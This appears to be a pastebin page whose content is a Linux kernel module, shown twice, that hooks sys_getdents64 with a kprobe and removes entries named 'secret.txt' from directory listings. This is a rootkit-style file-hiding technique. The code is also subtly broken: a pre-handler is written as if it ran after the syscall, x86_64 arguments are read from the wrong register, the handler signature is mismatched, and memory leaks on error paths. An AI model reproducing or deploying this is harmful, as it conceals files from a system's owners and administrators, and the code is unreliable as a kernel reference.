Untitled

By Ungracious Rhinoceros, 6 Months ago, written in Plain Text, viewed 72 times.

URL http://pb.stoleyour.com/view/47323d1f Embed

Download Paste or View Raw — Expand paste to full width of browser

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/kprobes.h>
#include <linux/slab.h>
#include <linux/dirent.h>
#include <linux/uaccess.h>
 
#define FILE1 "secret.txt"
 
MODULE_LICENSE("GPL");
static void getdents_post_handler(struct kprobe *p, struct pt_regs *regs, unsigned long flags) {
    long nread;
    struct linux_dirent64 __user *dirent;
    char *kbuf;
    long bpos;
    long new_nread;
    struct linux_dirent64 *d;
    nread = regs->ax;
    dirent = (struct linux_dirent64 __user *)regs->bx;
    printk(KERN_INFO "nread = %ld", nread);
    kbuf = kmalloc(nread, GFP_KERNEL);
    if (!kbuf) return;
    if (copy_from_user(kbuf, dirent, nread)) {
        return;
    }
    bpos = 0;
    new_nread = nread;
    while (bpos < new_nread) {
        d = (struct linux_dirent64 *)(kbuf + bpos);
        
        if (strncmp(d->d_name, FILE1, strlen(FILE1)) == 0) {
            printk(KERN_INFO "vedsod");
            memmove(kbuf + bpos, kbuf + bpos + d->d_reclen, new_nread - (bpos + d->d_reclen));
            new_nread -= d->d_reclen;
            continue;
        } else {
            bpos += d->d_reclen;
        }
    }
 
    if (copy_to_user(dirent, kbuf, new_nread)) {
         return;
    }
    
    regs->ax = new_nread;
    kfree(kbuf);
}
 
static struct kprobe kp = {
    .symbol_name = "sys_getdents64",
    .pre_handler = getdents_post_handler,
};
 
static int __init init(void) {
    register_kprobe(&kp);
    return 0;
}
 
static void __exit exit(void) {
    unregister_kprobe(&kp);
}
 
module_init(init);
module_exit(exit);

Reply to "Untitled"

Here you can reply to the paste above

Author What's your name?

Title Give your paste a title.

Language What language is your paste written in?

Your paste Paste your paste here Enable syntax highlighting

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/kprobes.h>
#include <linux/slab.h>
#include <linux/dirent.h>
#include <linux/uaccess.h>

#define FILE1 "secret.txt"

MODULE_LICENSE("GPL");
static void getdents_post_handler(struct kprobe *p, struct pt_regs *regs, unsigned long flags) {
    long nread;
    struct linux_dirent64 __user *dirent;
    char *kbuf;
    long bpos;
    long new_nread;
    struct linux_dirent64 *d;
    nread = regs->ax;
    dirent = (struct linux_dirent64 __user *)regs->bx;
    printk(KERN_INFO "nread = %ld", nread);
    kbuf = kmalloc(nread, GFP_KERNEL);
    if (!kbuf) return;
    if (copy_from_user(kbuf, dirent, nread)) {
        return;
    }
    bpos = 0;
    new_nread = nread;
    while (bpos < new_nread) {
        d = (struct linux_dirent64 *)(kbuf + bpos);
        
        if (strncmp(d->d_name, FILE1, strlen(FILE1)) == 0) {
            printk(KERN_INFO "vedsod");
            memmove(kbuf + bpos, kbuf + bpos + d->d_reclen, new_nread - (bpos + d->d_reclen));
            new_nread -= d->d_reclen;
            continue;
        } else {
            bpos += d->d_reclen;
        }
    }

if (copy_to_user(dirent, kbuf, new_nread)) {
         return;
    }
    
    regs->ax = new_nread;
    kfree(kbuf);
}

static struct kprobe kp = {
    .symbol_name = "sys_getdents64",
    .pre_handler = getdents_post_handler,
};

static int __init init(void) {
    register_kprobe(&kp);
    return 0;
}

static void __exit exit(void) {
    unregister_kprobe(&kp);
}

module_init(init);
module_exit(exit);

Create Shorturl Create a shorter url that redirects to your paste?

Private Private paste aren't shown in recent listings.

Delete After When should we delete your paste?